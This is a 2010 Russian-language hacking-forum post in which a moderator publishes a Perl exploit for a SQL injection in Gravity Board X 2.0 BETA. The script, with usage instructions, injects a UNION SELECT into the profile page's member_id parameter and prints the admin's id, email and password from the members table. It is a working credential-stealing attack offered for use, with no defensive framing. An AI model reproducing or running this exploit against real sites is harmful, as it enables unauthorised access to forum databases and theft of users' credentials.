Тема: Gravity Board X
Показать сообщение отдельно

  #2  
Старый 26.02.2010, 14:29
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

Опубликовал сплойт Gravity Board X 2.0 BETA (Public Release 3) SQL INJECTION EXPLOIT
PHP код:
#!/usr/bin/perl 
use LWP::Simple;
print 
"\n";
print 
"##############################################################\n";
print 
"# Gravity Board X 2.0 BETA (Public Release 3) SQL INJECTION  #\n";
print 
"# Author: Ctacok  (Russian)                                  #\n";
print 
"# Blog : www.Ctacok.ru                                       #\n";
print 
"# Special for Antichat (forum.antichat.ru) and xakep.ru      #\n";
print 
"# Big Thanks to Slip :)                                      #\n";
print 
"# Require : Magic_quotes = Off                               #\n";
print 
"##############################################################\n";
if (@
ARGV 2)
{
print 
"\n Usage: exploit.pl [host] [path] ";
print 
"\n EX : exploit.pl www.localhost.com /path/ prefix \n\n";
exit;
}
$host=$ARGV[0];
$path=$ARGV[1];
$prefix=$ARGV[2];   #  PREFIX TABLES, Default: gbx
$vuln "-2'+union+select+concat(0x3a3a3a,memberid,0x3a,email,0x3a,pw,0x3a3a3a)+from+".$prefix."_members";
$doc get($host.$path."index.php?action=viewprofile&member_id=".$vuln."+--+");
if (
$doc =~ /:::(.+):(.+):(.+):::/){
        print 
"\n[+] Admin id: : $1";
                print 
"\n[+] Admin email: $2";
                print 
"\n[+] Admin password: $3";

 
Ответить с цитированием